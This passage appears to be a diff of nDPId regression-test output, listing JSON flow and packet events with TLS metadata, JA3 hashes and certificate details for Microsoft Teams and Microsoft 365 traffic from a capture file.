{"version":"TLSv1.2","client_requested_server_name":"mobile.pipe.aria.microsoft.com","ja3":"a1674500365bdd882188db63730e69a2","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 
+00973{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1830,"source":"teams.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041685232,"flow_last_seen":1587041685278,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":206,"flow_tot_l4_payload_len":206,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1587041685278,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.33","src_port":60552,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobile.pipe.aria.microsoft.com","ja3":"a1674500365bdd882188db63730e69a2","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1833,"source":"teams.pcap","alias":"nDPId-test","flow_id":46,"flow_packet_id":2,"flow_last_seen":1587041685280,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1587041685280,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8VD9AAGwGx0kofgkHwKgBBgG77IwJMzAcxeiHxqASIADLBQAAAgQFoAEDAwgEAggKUkq4VzCEuV0="} 00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1834,"source":"teams.pcap","alias":"nDPId-test","flow_id":46,"flow_packet_id":3,"flow_last_seen":1587041685280,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1587041685280,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGR5HAqAEGKH4JB+yMAbvF6IfGCTMwHYAQEAkJnwAAAQEICjCEuXRSSrhX"} 
-00905{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1835,"source":"teams.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041685251,"flow_last_seen":1587041685281,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":246,"flow_tot_l4_payload_len":246,"flow_avg_l4_payload_len":61,"midstream":0,"thread_ts_msec":1587041685281,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"40.126.9.7","src_port":60556,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Microsoft365","breed":"Acceptable","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"login.microsoftonline.com","ja3":"a69708a64f853c3bcc214c2c5faf84f3","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1"}} +00905{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1835,"source":"teams.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041685251,"flow_last_seen":1587041685281,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":246,"flow_tot_l4_payload_len":246,"flow_avg_l4_payload_len":61,"midstream":0,"thread_ts_msec":1587041685281,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"40.126.9.7","src_port":60556,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Microsoft365","breed":"Acceptable","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"login.microsoftonline.com","ja3":"a69708a64f853c3bcc214c2c5faf84f3","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1"}} 
00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1841,"source":"teams.pcap","alias":"nDPId-test","flow_id":45,"flow_packet_id":2,"flow_last_seen":1587041685294,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1587041685294,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8VA1AAGwGd200ck0hwKgBBgG77IvHJo2qMLP5JqASIAAqDQAAAgQFoAEDAwgEAggKYR8CxDCEuVo="} 00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1842,"source":"teams.pcap","alias":"nDPId-test","flow_id":45,"flow_packet_id":3,"flow_last_seen":1587041685294,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1587041685294,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAG94LAqAEGNHJNIeyLAbsws\/kmxyaNq4AQEAlolwAAAQEICjCEuYBhHwLE"} -00973{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1843,"source":"teams.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041685248,"flow_last_seen":1587041685294,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":190,"flow_tot_l4_payload_len":190,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1587041685294,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.33","src_port":60555,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobile.pipe.aria.microsoft.com","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 
-01502{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1864,"source":"teams.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1587041685232,"flow_last_seen":1587041685327,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":4409,"flow_avg_l4_payload_len":551,"midstream":0,"thread_ts_msec":1587041685327,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.33","src_port":60552,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobile.pipe.aria.microsoft.com","server_names":"*.events.data.microsoft.com,events.data.microsoft.com,*.pipe.aria.microsoft.com,pipe.skype.com,*.pipe.skype.com,*.mobile.events.data.microsoft.com,mobile.events.data.microsoft.com,*.events.data.msn.com,events.data.msn.com","ja3":"a1674500365bdd882188db63730e69a2","ja3s":"ae4edc6faf64d08308082ad26be60767","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, OU=Microsoft IT, CN=Microsoft IT TLS CA 4","subjectDN":"CN=*.events.data.microsoft.com","fingerprint":"33:B3:B7:E9:DA:25:F5:A0:04:E9:63:87:B6:FB:54:77:DB:ED:27:EB"}} 
-01503{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1874,"source":"teams.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":11,"flow_first_seen":1587041685248,"flow_last_seen":1587041685350,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":6269,"flow_avg_l4_payload_len":569,"midstream":0,"thread_ts_msec":1587041685350,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.33","src_port":60555,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobile.pipe.aria.microsoft.com","server_names":"*.events.data.microsoft.com,events.data.microsoft.com,*.pipe.aria.microsoft.com,pipe.skype.com,*.pipe.skype.com,*.mobile.events.data.microsoft.com,mobile.events.data.microsoft.com,*.events.data.msn.com,events.data.msn.com","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"986571066668055ae9481cb84fda634a","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, OU=Microsoft IT, CN=Microsoft IT TLS CA 4","subjectDN":"CN=*.events.data.microsoft.com","fingerprint":"33:B3:B7:E9:DA:25:F5:A0:04:E9:63:87:B6:FB:54:77:DB:ED:27:EB"}} 
+00973{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1843,"source":"teams.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041685248,"flow_last_seen":1587041685294,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":190,"flow_tot_l4_payload_len":190,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1587041685294,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.33","src_port":60555,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobile.pipe.aria.microsoft.com","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +00916{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1846,"source":"teams.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1587041685251,"flow_last_seen":1587041685312,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1686,"flow_avg_l4_payload_len":337,"midstream":0,"thread_ts_msec":1587041685312,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"40.126.9.7","src_port":60556,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Microsoft365","breed":"Acceptable","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"login.microsoftonline.com","ja3":"a69708a64f853c3bcc214c2c5faf84f3","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1"}} 
+01502{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1864,"source":"teams.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1587041685232,"flow_last_seen":1587041685327,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":4409,"flow_avg_l4_payload_len":551,"midstream":0,"thread_ts_msec":1587041685327,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.33","src_port":60552,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobile.pipe.aria.microsoft.com","server_names":"*.events.data.microsoft.com,events.data.microsoft.com,*.pipe.aria.microsoft.com,pipe.skype.com,*.pipe.skype.com,*.mobile.events.data.microsoft.com,mobile.events.data.microsoft.com,*.events.data.msn.com,events.data.msn.com","ja3":"a1674500365bdd882188db63730e69a2","ja3s":"ae4edc6faf64d08308082ad26be60767","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, OU=Microsoft IT, CN=Microsoft IT TLS CA 4","subjectDN":"CN=*.events.data.microsoft.com","fingerprint":"33:B3:B7:E9:DA:25:F5:A0:04:E9:63:87:B6:FB:54:77:DB:ED:27:EB"}} 
+01503{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1874,"source":"teams.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":11,"flow_first_seen":1587041685248,"flow_last_seen":1587041685350,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":6269,"flow_avg_l4_payload_len":569,"midstream":0,"thread_ts_msec":1587041685350,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.33","src_port":60555,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobile.pipe.aria.microsoft.com","server_names":"*.events.data.microsoft.com,events.data.microsoft.com,*.pipe.aria.microsoft.com,pipe.skype.com,*.pipe.skype.com,*.mobile.events.data.microsoft.com,mobile.events.data.microsoft.com,*.events.data.msn.com,events.data.msn.com","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"986571066668055ae9481cb84fda634a","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, OU=Microsoft IT, CN=Microsoft IT TLS CA 4","subjectDN":"CN=*.events.data.microsoft.com","fingerprint":"33:B3:B7:E9:DA:25:F5:A0:04:E9:63:87:B6:FB:54:77:DB:ED:27:EB"}} 00185{"error_event_id":5,"error_event_name":"Unknown packet type","datalink":1,"packet_id":1897,"source":"teams.pcap","alias":"nDPId-test","layer_type":34969,"global_ts_msec":1587041685406} 
00358{"packet_event_id":1,"packet_event_name":"packet","packet_id":1897,"source":"teams.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":34969,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1587041685403,"pkt":"\/\/\/\/\/\/\/\/2A0X1lWriJklgAAA2A0X1lWrAACAAADYDRfWVauACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"} -01378{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1908,"source":"teams.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":11,"flow_first_seen":1587041685106,"flow_last_seen":1587041685420,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":6165,"flow_avg_l4_payload_len":560,"midstream":0,"thread_ts_msec":1587041685420,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.15.45","src_port":60551,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"trouter2-asse-a.trouter.teams.microsoft.com","server_names":"*.trouter.teams.microsoft.com,go.trouter.io,*.drip.trouter.io,*.dc.trouter.io","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"986571066668055ae9481cb84fda634a","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, OU=Microsoft IT, CN=Microsoft IT TLS CA 2","subjectDN":"CN=*.trouter.teams.microsoft.com","fingerprint":"DD:24:DF:0E:F3:63:CC:10:B5:03:CF:34:EB:A5:14:8B:97:90:9B:D4"}} 
+01378{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1908,"source":"teams.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":11,"flow_first_seen":1587041685106,"flow_last_seen":1587041685420,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":6165,"flow_avg_l4_payload_len":560,"midstream":0,"thread_ts_msec":1587041685420,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.15.45","src_port":60551,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"trouter2-asse-a.trouter.teams.microsoft.com","server_names":"*.trouter.teams.microsoft.com,go.trouter.io,*.drip.trouter.io,*.dc.trouter.io","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"986571066668055ae9481cb84fda634a","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, OU=Microsoft IT, CN=Microsoft IT TLS CA 2","subjectDN":"CN=*.trouter.teams.microsoft.com","fingerprint":"DD:24:DF:0E:F3:63:CC:10:B5:03:CF:34:EB:A5:14:8B:97:90:9B:D4"}} 00182{"error_event_id":5,"error_event_name":"Unknown packet type","datalink":1,"packet_id":1979,"source":"teams.pcap","alias":"nDPId-test","layer_type":38,"global_ts_msec":1587041685611} 00347{"packet_event_id":1,"packet_event_name":"packet","packet_id":1979,"source":"teams.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1587041685546,"pkt":"AYDCAAAAeCjKBfrMACZCQgMAAAAAAJAAeCjKBfrMAAAAAJAAeCjKBfrMgAEAAAYAAQAEAKWlpaWlpaWl"} 
00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2018,"source":"teams.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041685984,"flow_last_seen":1587041685984,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1587041685984,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.113.194.132","src_port":60557,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2018,"source":"teams.pcap","alias":"nDPId-test","flow_id":47,"flow_packet_id":1,"flow_last_seen":1587041685984,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1587041685984,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGghTAqAEGNHHChOyNAbtKVk3bAAAAALAC\/\/8LQAAAAgQFtAEDAwUBAQgKMIS8GgAAAAAEAgAA"} 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2019,"source":"teams.pcap","alias":"nDPId-test","flow_id":47,"flow_packet_id":2,"flow_last_seen":1587041685996,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1587041685996,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA0TQBAAHUGACA0ccKEwKgBBgG77I3LqgPISlZN3IAS\/\/9gggAAAgQFoAEDAwgBAQQC"} 00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2020,"source":"teams.pcap","alias":"nDPId-test","flow_id":47,"flow_packet_id":3,"flow_last_seen":1587041685996,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1587041685996,"pkt":"EBMx8Tl2KDc3AG3ICABFAAAoAABAAEAGgizAqAEGNHHChOyNAbtKVk3cy6oDyVAQIACBQQAA"} 
-00968{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2021,"source":"teams.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041685984,"flow_last_seen":1587041685997,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":179,"flow_tot_l4_payload_len":179,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1587041685997,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.113.194.132","src_port":60557,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"teams.microsoft.com","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -01288{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2029,"source":"teams.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":12,"flow_first_seen":1587041685984,"flow_last_seen":1587041686010,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":6191,"flow_avg_l4_payload_len":515,"midstream":0,"thread_ts_msec":1587041686010,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.113.194.132","src_port":60557,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"teams.microsoft.com","server_names":"teams.microsoft.com","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"7d8fd34fdb13a7fff30d5a52846b6c4c","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, OU=Microsoft IT, CN=Microsoft IT TLS CA 4","subjectDN":"CN=teams.microsoft.com","fingerprint":"68:1E:E8:3C:83:70:6F:E3:86:F4:E8:8C:C4:E6:A0:9A:3E:E0:9C:0E"}} +00968{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2021,"source":"teams.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041685984,"flow_last_seen":1587041685997,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":179,"flow_tot_l4_payload_len":179,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1587041685997,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.113.194.132","src_port":60557,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"teams.microsoft.com","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 
+01288{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2029,"source":"teams.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":12,"flow_first_seen":1587041685984,"flow_last_seen":1587041686010,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":6191,"flow_avg_l4_payload_len":515,"midstream":0,"thread_ts_msec":1587041686010,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.113.194.132","src_port":60557,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"teams.microsoft.com","server_names":"teams.microsoft.com","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"7d8fd34fdb13a7fff30d5a52846b6c4c","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, OU=Microsoft IT, CN=Microsoft IT TLS CA 4","subjectDN":"CN=teams.microsoft.com","fingerprint":"68:1E:E8:3C:83:70:6F:E3:86:F4:E8:8C:C4:E6:A0:9A:3E:E0:9C:0E"}} 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2043,"source":"teams.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041686239,"flow_last_seen":1587041686239,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1587041686239,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.33","src_port":60559,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2043,"source":"teams.pcap","alias":"nDPId-test","flow_id":48,"flow_packet_id":1,"flow_last_seen":1587041686239,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1587041686239,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAG93bAqAEGNHJNIeyPAbtgh2e9AAAAALAC\/\/9PlwAAAgQFtAEDAwUBAQgKMIS9EAAAAAAEAgAA"} 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2044,"source":"teams.pcap","alias":"nDPId-test","flow_id":48,"flow_packet_id":2,"flow_last_seen":1587041686288,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1587041686288,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8YwZAAGwGaHQ0ck0hwKgBBgG77I9T9FE0YIdnvqASIADemAAAAgQFoAEDAwgEAggKYR9buzCEvRA="} 00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2045,"source":"teams.pcap","alias":"nDPId-test","flow_id":48,"flow_packet_id":3,"flow_last_seen":1587041686288,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1587041686288,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAG94LAqAEGNHJNIeyPAbtgh2e+U\/RRNYAQEAkdGQAAAQEICjCEvUBhH1u7"} 
